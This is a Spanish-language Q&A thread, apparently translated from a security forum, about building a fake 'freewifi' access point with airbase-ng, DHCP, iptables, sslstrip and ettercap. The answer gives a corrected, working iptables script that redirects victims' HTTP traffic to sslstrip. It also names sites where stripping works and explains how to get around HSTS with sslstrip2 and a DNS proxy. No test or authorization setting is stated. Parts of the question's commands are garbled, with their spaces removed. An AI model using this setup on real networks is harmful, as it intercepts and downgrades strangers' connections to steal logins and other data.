Configuración de un AP falso - problema con iptables y servidor DNS

3

Estoy intentando configurar un AP falso usando el paquete aircrack-ng, el servidor DHCP & iptables.

Después de crear el AP falso :

airmon-ng start wlan1
airbase-ng -c 11 -e "freewifi" wlan1mon

ejecutandolaconfiguracióndeiptablesylasreglasdeenrutamientoat0(archivobash):

#!/bin/shifconfigat0upifconfigat010.0.0.1netmask255.255.255.0echo1>/proc/sys/net/ipv4/ip_forwardiptables--flushiptables--tablenat--flushiptables--delete-chainiptables--tablenat--delete-chainiptables-PFORWARDACCEPTiptables-tnat-APREROUTING-ptcp--destination-port80-jREDIRECT--to-port10000iptables-tnat-APOSTROUTING-owlan0-jMASQUERADE

ejecutandoelservidorDHCP:/etc/init.d/isc-dhcp-serverstart

/etc/dhcp/dhpd.conffile:

authoritative;default-lease-time600;max-lease-time7200;subnet10.0.0.0netmask255.255.255.0{optionsubnet-mask255.255.255.0;optiondomain-name"freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}

/ etc / default / isc-dhcp-server file:

Ejecutandosslstripyettercap:

sslstrip-f-p-kettercap-p-u-T-q-iat0

Primero,noseproporcionaconexiónaInternet,puedoconectarmeamiAP"freewifi" e incluso tengo una dirección IP, pero no se puede hacer la conexión a Internet:

entonces, me he dado cuenta de que tiene Http s en la dirección, sslstrip debería quitar las s de http s , por lo que eso también fue extraño.

Sospecho que quizás tengo un problema con mi puente (iptables), ¿alguna ayuda?

Kali Linux.

    
pregunta eyal360 26.01.2017 - 14:01
fuente

1 respuesta

3

Tienes diferentes problemas aquí. Creo que el punto de acceso y dhcp están bien. Hablemos de iptables y sslstrip.

en sslstrip, está usando los argumentos -f -p -k 10000 pero no tiene sentido ... el puerto 10000 es el predeterminado. Y para configurar el puerto debe usar -l para evitar su uso. Debería ser sslstrip -f -p -k y eso es todo o puedes poner sslstrip -f -p -k -l 10000 que es lo mismo.

Hablando de iptables y reenvío. echo 1 > /proc/sys/net/ipv4/ip_forward está bien. El route add no tiene sentido. Ya tienes acceso a Internet en eth0 (supongo), por lo que no necesitas una ruta para la red de aplicaciones falsas. Por supuesto, at0 ip debe ser un rango de red diferente al de eth0. Ponga un rango de IP diferente, algo como 172.16.0.0/24 por ejemplo o cualquier otro.

Pero el orden de las reglas en iptables es importante. El enmascaramiento debe hacerse al final. Y tienes un error tipográfico en el puerto ssl. Usted pone 1000 en lugar de 10000 !!!! < - OP editó su pregunta y la corrigió.

Las descargas están bien:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

Y luego, si tiene la política general FORWARD con ACCEPT, no tiene sentido hacer reglas FORWARD con -j ACCEPT como este iptables --append FORWARD --in-interface at0 -j ACCEPT . Olvídate de las reglas sobre udp ... la navegación web es tcp, por lo que esto no es importante: iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 . El único punto de hacer esto es redirigir el tráfico de DNS a su propio servidor de DNS ... Pero no puedo ver que tenga un servidor de DNS en este ejemplo, por lo que no tiene sentido.

Esto debería ser:

iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Y eso es todo.

Así que la compilación final es:

#!/bin/sh
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

De todos modos, puedo recomendarte un script en el que colaboro, lo que automatiza todo esto y es muy práctico. Tiene muchas características de FakeAP / Evil Twin: airgeddon . ¡Darle una oportunidad! es un buen script que ya está incluido en los repositorios de BlackArch, Wifislax y ArchStrike.

¡Buena suerte! y recuerde que para probar sslstrip debe usar las URL sin poner explícitamente https . Y Facebook es un mal punto de partida debido a HSTS. ¡Prueba con outlook.com que funciona! Para evitar que HSTS sea más avanzado, necesitará sslstrip2 (también llamado sslstrip +) y necesitará un proxy + dns (otra característica entrante de airgeddon que ya está desarrollada y se encuentra en fase de prueba, se encuentra en una rama de desarrollo y tal vez esta semana podría ser en master).

    
respondido por el OscarAkaElvis 27.01.2017 - 09:31
fuente

Lea otras preguntas en las etiquetas